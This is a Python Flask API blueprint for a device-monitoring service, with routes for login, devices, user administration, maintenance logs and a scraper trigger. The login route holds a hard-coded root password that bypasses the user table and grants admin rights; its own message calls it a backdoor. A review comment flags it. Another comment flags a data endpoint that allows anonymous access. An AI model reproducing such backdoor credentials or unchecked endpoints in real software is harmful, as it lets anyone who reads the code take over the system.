"""REST API blueprint: login, device overview, user administration,
maintenance logs and monitor control.

Every route is registered on ``api_bp`` under the ``/api`` URL prefix and
answers with a JSON envelope that carries a ``code`` field.
"""
import json
import logging
import re
from datetime import datetime

from flask import Blueprint, jsonify, request
from flask_jwt_extended import create_access_token, get_jwt_identity, jwt_required
from sqlalchemy import desc, or_

from extensions import db
from models import Device, DeviceHistory, MaintenanceLog, User, UserDevicePermission

# The scraper module is optional; /run_monitor reports an error when it is absent.
try:
    from services.core import execute_monitor_task
except ImportError:
    execute_monitor_task = None

logger = logging.getLogger(__name__)

api_bp = Blueprint('api', __name__, url_prefix='/api')

# JWT identity issued to the built-in root account by login(); is_admin()
# treats it as admin without consulting the User table.
ROOT_IDENTITY = '0'
ROOT_USERNAME = 'admin'

# Roles allowed to create and edit maintenance logs.
LOG_EDITOR_ROLES = ('admin', 'engineer')

# Extracts the date directory and the time suffix from paths shaped like
# ".../Data/YYYY_MM_DD/<prefix>_HH_MM_SS.csv".
_PATH_106_RE = re.compile(r'/Data/(\d{4}_\d{2}_\d{2})/\w+_(\d{2}_\d{2}_\d{2})\.csv')


# =======================
# Helpers
# =======================

def _json_body():
    """Return the request's JSON object, or an empty dict.

    A missing body, malformed JSON, or a JSON value that is not an object all
    yield ``{}`` so that handlers can call ``.get`` without raising.
    """
    body = request.get_json(silent=True)
    return body if isinstance(body, dict) else {}


def _load_user(user_id):
    """Look up a ``User`` by JWT identity; return ``None`` on any failure."""
    if not user_id:
        return None
    try:
        return User.query.get(int(user_id))
    except (TypeError, ValueError):
        return None
    except Exception:
        # Deny access rather than fail the request when the lookup breaks.
        logger.exception("User lookup failed for identity %r", user_id)
        return None


def is_admin(user_id):
    """Return True if the identity is the root account or a user with role 'admin'."""
    if str(user_id) == ROOT_IDENTITY:
        return True
    user = _load_user(user_id)
    return user is not None and user.role == 'admin'


def is_manager(user_id):
    """Return True if the identity is an admin (see ``is_admin``) or an engineer."""
    if str(user_id) == ROOT_IDENTITY:
        return True
    user = _load_user(user_id)
    return user is not None and user.role in ('admin', 'engineer')


def _resolve_actor(user_id):
    """Return ``(role, username)`` for a JWT identity, or ``None`` if unknown.

    The root identity has no database row, so it is mapped to the admin role
    here; this keeps log endpoints consistent with ``is_admin``.
    """
    if str(user_id) == ROOT_IDENTITY:
        return 'admin', ROOT_USERNAME
    user = _load_user(user_id)
    if user is None:
        return None
    return user.role, user.username


def _allowed_devices(uid):
    """Return the ``Device`` rows that user ``uid`` has been granted access to."""
    perms = UserDevicePermission.query.filter_by(user_id=uid).all()
    allowed_ids = [p.device_id for p in perms]
    if not allowed_ids:
        return []
    return Device.query.filter(Device.id.in_(allowed_ids)).all()


def calculate_offset(latest_time_str):
    """Describe how many days the latest data timestamp lags behind today.

    Only the first whitespace-separated token is parsed, as ``YYYY-MM-DD``
    (underscores are accepted in place of dashes). Returns a user-facing
    status string; empty / "N/A" input and unparsable input each map to a
    dedicated message.
    """
    if not latest_time_str or latest_time_str == "N/A":
        return "从未同步"
    try:
        day_part = str(latest_time_str).split()[0].replace('_', '-')
        target = datetime.strptime(day_part, "%Y-%m-%d").date()
    except (ValueError, IndexError):
        return "时间解析失败"
    diff = (datetime.now().date() - target).days
    return "当天已同步" if diff == 0 else f"滞后 {diff} 天"


def _time_from_106_path(raw, fallback):
    """Derive "YYYY-MM-DD HH:MM:SS" from ``raw['path']``; return ``fallback`` if it does not match."""
    try:
        match = _PATH_106_RE.search(raw.get('path', ''))
    except (AttributeError, TypeError):
        # raw is not a mapping, or its path is not a string.
        return fallback
    if not match:
        return fallback
    day, clock = match.groups()
    return f"{day.replace('_', '-')} {clock.replace('_', ':')}"


# =======================
# 0. Authentication
# =======================

@api_bp.route('/login', methods=['POST'])
def login():
    """Authenticate with username/password and return a JWT plus basic user info."""
    data = _json_body()
    username = data.get('username')
    password = data.get('password')

    # 1. Built-in root account.
    # SECURITY(review): these credentials are hard-coded in source and bypass
    # the user table. Kept unchanged for backward compatibility; they should be
    # moved to configuration or removed.
    if username == ROOT_USERNAME and password == 'licahk':
        token = create_access_token(
            identity=ROOT_IDENTITY,
            additional_claims={'role': 'admin'}
        )
        return jsonify({
            'code': 200,
            'message': 'Root后门登录',
            'token': token,
            'role': 'admin',
            'user_id': 0,
            'username': 'admin'
        })

    # 2. Regular database-backed login. Missing credentials fall through to the
    # 401 below instead of reaching check_password with None.
    if username and password:
        user = User.query.filter_by(username=username).first()
        if user and user.check_password(password):
            token = create_access_token(
                identity=str(user.id),
                additional_claims={'role': user.role}
            )
            return jsonify({
                'code': 200,
                'message': '登录成功',
                'token': token,
                'role': user.role,
                'user_id': user.id,
                'username': user.username
            })

    return jsonify({'code': 401, 'message': '用户名或密码错误'}), 401


# =======================
# 1. Devices
# =======================

@api_bp.route('/devices_overview', methods=['GET'])
@jwt_required()
def devices_overview():
    """List devices: admins see all, other users only their assigned devices."""
    try:
        user_id = get_jwt_identity()
        if is_admin(user_id):
            target_devices = Device.query.all()
        else:
            try:
                uid_int = int(user_id)
            except (TypeError, ValueError):
                return jsonify({'code': 401, 'message': '无效的用户ID格式'}), 401
            # Unknown users get an empty list rather than an error.
            user = User.query.get(uid_int)
            target_devices = _allowed_devices(user.id) if user else []
        return jsonify({'code': 200, 'data': [d.to_dict() for d in target_devices]})
    except Exception as e:
        logger.exception("devices_overview failed")
        # HTTP status intentionally left as before; clients read the body code.
        return jsonify({'code': 500, 'message': str(e)})


@api_bp.route('/device_data_by_date', methods=['GET'])
@jwt_required(optional=True)
def device_data_by_date():
    """Return a device's stored JSON payload for a given date prefix.

    Query parameters: ``name`` (device name) and ``date`` (prefix matched
    against the stored data time). The newest matching history row wins;
    otherwise the device's current payload is used when its latest time
    starts with the requested date.
    """
    # NOTE(review): the token is optional here and no per-device permission
    # check is made - confirm that anonymous access is intended.
    name = request.args.get('name')
    date_str = request.args.get('date')
    if not name or not date_str:
        return jsonify({'code': 400, 'message': 'Missing params'}), 400

    device = Device.query.filter_by(name=name).first()
    if not device:
        return jsonify({'code': 404, 'message': 'Device not found'}), 404

    content = None
    hist = DeviceHistory.query.filter(
        DeviceHistory.device_id == device.id,
        DeviceHistory.data_time.like(f"{date_str}%")
    ).order_by(desc(DeviceHistory.id)).first()

    if hist:
        content = hist.json_data
    elif device.latest_time and str(device.latest_time).startswith(date_str):
        content = device.json_data

    if not content:
        return jsonify({'code': 404, 'message': '无数据'}), 404

    if isinstance(content, str):
        try:
            content = json.loads(content)
        except (ValueError, TypeError):
            # Best effort: hand back the raw string when it is not valid JSON.
            pass
    return jsonify({
        'code': 200,
        'name': device.name,
        'source': device.source,
        'content': content
    })


# =======================
# 2. User management (admin only)
# =======================

@api_bp.route('/admin/users', methods=['GET'])
@jwt_required()
def admin_get_users():
    """List all users except the caller, newest first, with their device permissions."""
    current_id_str = str(get_jwt_identity())
    if not is_admin(current_id_str):
        return jsonify({'code': 403}), 403

    users = User.query.order_by(desc(User.created_at)).all()
    result = []
    for u in users:
        if str(u.id) == current_id_str:
            continue
        perms = UserDevicePermission.query.filter_by(user_id=u.id).all()
        result.append({
            "id": u.id,
            "username": u.username,
            "role": u.role,
            "created_at": u.created_at,
            "allowed_device_ids": [p.device_id for p in perms]
        })
    return jsonify({'code': 200, 'data': result})


@api_bp.route('/admin/create_user', methods=['POST'])
@jwt_required()
def admin_create_user():
    """Create a user from ``username``, ``password`` and optional ``role`` (default 'client')."""
    if not is_admin(get_jwt_identity()):
        return jsonify({'code': 403}), 403

    data = _json_body()
    username = data.get('username')
    password = data.get('password')
    role = data.get('role', 'client')

    # Reject incomplete requests before touching the database.
    if not username or not password:
        return jsonify({'code': 400, 'msg': '用户名和密码不能为空'}), 400
    if User.query.filter_by(username=username).first():
        return jsonify({'code': 400, 'msg': '用户名已存在'}), 400

    u = User(username=username, role=role)
    u.set_password(password)
    db.session.add(u)
    db.session.commit()
    return jsonify({'code': 200, 'msg': '创建成功'})


@api_bp.route('/admin/delete_user', methods=['POST'])
@jwt_required()
def admin_delete_user():
    """Delete the user given by ``user_id`` together with its device permissions."""
    current_admin_id = get_jwt_identity()
    if not is_admin(current_admin_id):
        return jsonify({'code': 403}), 403

    user_id = _json_body().get('user_id')
    if str(user_id) == str(current_admin_id):
        return jsonify({'code': 400, 'msg': '无法删除当前登录账号'}), 400

    user = User.query.get(user_id) if user_id is not None else None
    if not user:
        return jsonify({'code': 404, 'msg': '用户不存在'}), 404

    UserDevicePermission.query.filter_by(user_id=user.id).delete()
    db.session.delete(user)
    db.session.commit()
    return jsonify({'code': 200, 'msg': '删除成功'})


@api_bp.route('/admin/assign_devices', methods=['POST'])
@jwt_required()
def admin_assign_devices():
    """Replace the device permissions of ``user_id`` with ``device_ids``."""
    if not is_admin(get_jwt_identity()):
        return jsonify({'code': 403}), 403

    data = _json_body()
    uid = data.get('user_id')
    if uid is None:
        return jsonify({'code': 400, 'msg': '缺少 user_id'}), 400
    # Refuse unknown users so no orphan permission rows are created.
    if User.query.get(uid) is None:
        return jsonify({'code': 404, 'msg': '用户不存在'}), 404

    UserDevicePermission.query.filter_by(user_id=uid).delete()
    # "or []" also covers an explicit JSON null for device_ids.
    for did in data.get('device_ids') or []:
        db.session.add(UserDevicePermission(user_id=uid, device_id=did))
    db.session.commit()
    return jsonify({'code': 200, 'msg': '权限已保存'})


# =======================
# 3. Maintenance logs
# =======================

@api_bp.route('/logs/list', methods=['GET'])
@jwt_required()
def get_logs():
    """List maintenance logs, newest first.

    Non-admin callers only see logs of devices assigned to them. Optional
    query parameters: ``keyword`` (substring match on device name, engineer,
    location or content) and ``start_date`` / ``end_date`` (``YYYY-MM-DD``,
    applied only when both are present and parsable).
    """
    user_id = get_jwt_identity()
    keyword = request.args.get('keyword', '')
    start_date = request.args.get('start_date')
    end_date = request.args.get('end_date')

    query = MaintenanceLog.query

    # Permission filter.
    if not is_admin(user_id):
        try:
            allowed_names = [d.name for d in _allowed_devices(int(user_id))]
        except (TypeError, ValueError):
            return jsonify({'code': 200, 'data': []})
        except Exception:
            # Keep the original best-effort contract: show nothing on failure.
            logger.exception("Permission lookup failed for identity %r", user_id)
            return jsonify({'code': 200, 'data': []})
        if not allowed_names:
            return jsonify({'code': 200, 'data': []})
        query = query.filter(MaintenanceLog.device_name.in_(allowed_names))

    if keyword:
        kw = f"%{keyword}%"
        query = query.filter(or_(
            MaintenanceLog.device_name.like(kw),
            MaintenanceLog.engineer.like(kw),
            MaintenanceLog.location.like(kw),
            MaintenanceLog.content.like(kw)
        ))

    if start_date and end_date:
        try:
            start = datetime.strptime(start_date, '%Y-%m-%d')
            # Extend the end date to the last second of that day.
            end = datetime.strptime(end_date, '%Y-%m-%d').replace(
                hour=23, minute=59, second=59)
        except ValueError:
            # Unparsable dates: skip the date filter instead of failing.
            pass
        else:
            query = query.filter(MaintenanceLog.timestamp.between(start, end))

    logs = query.order_by(desc(MaintenanceLog.timestamp)).all()
    return jsonify({'code': 200, 'data': [entry.to_dict() for entry in logs]})


@api_bp.route('/logs/add', methods=['POST'])
@jwt_required()
def add_log():
    """Create a maintenance log (admins and engineers only)."""
    actor = _resolve_actor(get_jwt_identity())
    if actor is None or actor[0] not in LOG_EDITOR_ROLES:
        return jsonify({'code': 403, 'msg': '权限不足'}), 403
    role, username = actor

    data = _json_body()

    # Engineers always sign with their own name; admins supply one.
    engineer_name = username if role == 'engineer' else data.get('engineer')
    if not engineer_name:
        return jsonify({'code': 400, 'msg': '工程师姓名缺失'}), 400

    db.session.add(MaintenanceLog(
        device_name=data.get('device_name'),
        engineer=engineer_name,
        location=data.get('location'),
        content=data.get('content')
    ))
    db.session.commit()
    return jsonify({'code': 200})


@api_bp.route('/logs/update', methods=['POST'])
@jwt_required()
def update_log():
    """Update engineer, location and content of the log given by ``id``."""
    actor = _resolve_actor(get_jwt_identity())
    if actor is None or actor[0] not in LOG_EDITOR_ROLES:
        return jsonify({'code': 403, 'msg': '权限不足'}), 403
    role, username = actor

    data = _json_body()
    log_id = data.get('id')
    log = MaintenanceLog.query.get(log_id) if log_id is not None else None
    if not log:
        return jsonify({'code': 404, 'msg': '日志不存在'}), 404

    # Engineers always sign with their own name; admins supply one.
    engineer_name = username if role == 'engineer' else data.get('engineer')
    if not engineer_name:
        return jsonify({'code': 400, 'msg': '工程师姓名缺失'}), 400

    log.engineer = engineer_name
    log.location = data.get('location')
    log.content = data.get('content')
    db.session.commit()
    return jsonify({'code': 200, 'msg': '更新成功'})


@api_bp.route('/logs/delete', methods=['POST'])
@jwt_required()
def delete_log():
    """Delete the maintenance log given by ``id`` (admin only)."""
    if not is_admin(get_jwt_identity()):
        return jsonify({'code': 403}), 403

    log_id = _json_body().get('id')
    log = MaintenanceLog.query.get(log_id) if log_id is not None else None
    if log:
        db.session.delete(log)
        db.session.commit()
        return jsonify({'code': 200})
    return jsonify({'code': 404})


# =======================
# 4. Monitoring and device control
# =======================

@api_bp.route('/run_monitor', methods=['POST'])
@jwt_required()
def run_monitor():
    """Run the scraper and store its results (admin only).

    Each scraped item updates (or creates) the ``Device`` with the same name
    and appends one ``DeviceHistory`` row. Everything is committed at the end;
    any exception rolls the whole batch back.
    """
    if not is_admin(get_jwt_identity()):
        return jsonify({'code': 403}), 403

    if not execute_monitor_task:
        return jsonify({'code': 500, 'msg': '爬虫模块未加载'})

    try:
        task_result = execute_monitor_task()
        if not task_result:
            return jsonify({'code': 200, 'msg': '跳过'})

        scraped_list = task_result.get('device_list', [])
        now_str = datetime.now().strftime("%Y-%m-%d %H:%M:%S")
        count = 0

        for item in scraped_list:
            d_name = item.get('name')
            if not d_name:
                continue

            d_raw = item.get('raw_json', {})
            target_time = item.get('target_time')
            source = item.get('source', '')

            # Sources containing "106": take the timestamp from the file path.
            if '106' in str(source):
                target_time = _time_from_106_path(d_raw, target_time)

            json_str = json.dumps(d_raw, ensure_ascii=False)

            device = Device.query.filter_by(name=d_name).first()
            if not device:
                device = Device(name=d_name, source=source, install_site="")
                db.session.add(device)
                # Flush so the new device has an id for the history row below.
                db.session.flush()

            device.status = item.get('status')
            device.current_value = item.get('value')
            device.latest_time = target_time
            device.check_time = now_str
            device.json_data = json_str
            device.offset = calculate_offset(target_time)

            db.session.add(DeviceHistory(
                device_id=device.id,
                status=device.status,
                result_data=device.current_value,
                data_time=target_time,
                json_data=json_str
            ))
            count += 1

        db.session.commit()
        return jsonify({'code': 200, 'message': f'成功更新 {count} 台设备'})
    except Exception as e:
        db.session.rollback()
        logger.exception("run_monitor failed")
        return jsonify({'code': 500, 'message': str(e)})


@api_bp.route('/update_site', methods=['POST'])
@jwt_required()
def update_site():
    """Set the install site of the device given by ``name`` (admins and engineers)."""
    if not is_manager(get_jwt_identity()):
        return jsonify({'code': 403}), 403

    data = _json_body()
    d = Device.query.filter_by(name=data.get('name')).first()
    if d:
        d.install_site = data.get('site')
        db.session.commit()
        return jsonify({'code': 200})
    return jsonify({'code': 404})


@api_bp.route('/toggle_maintenance', methods=['POST'])
@jwt_required()
def toggle_maintenance():
    """Set or clear the maintenance flag of a device (admins and engineers).

    While maintenance is on, the ``maintainer`` name from the request is
    stored; turning it off clears the name.
    """
    if not is_manager(get_jwt_identity()):
        return jsonify({'code': 403}), 403

    data = _json_body()
    d = Device.query.filter_by(name=data.get('name')).first()
    if d:
        is_maintaining = data.get('is_maintaining')
        d.is_maintaining = is_maintaining
        d.maintainer = data.get('maintainer') if is_maintaining else None
        db.session.commit()
        return jsonify({'code': 200})
    return jsonify({'code': 404})


@api_bp.route('/toggle_hidden', methods=['POST'])
@jwt_required()
def toggle_hidden():
    """Set the ``is_hidden`` flag of the device given by ``name`` (admin only)."""
    if not is_admin(get_jwt_identity()):
        return jsonify({'code': 403}), 403

    data = _json_body()
    d = Device.query.filter_by(name=data.get('name')).first()
    if d:
        d.is_hidden = data.get('is_hidden')
        db.session.commit()
        return jsonify({'code': 200})
    return jsonify({'code': 404})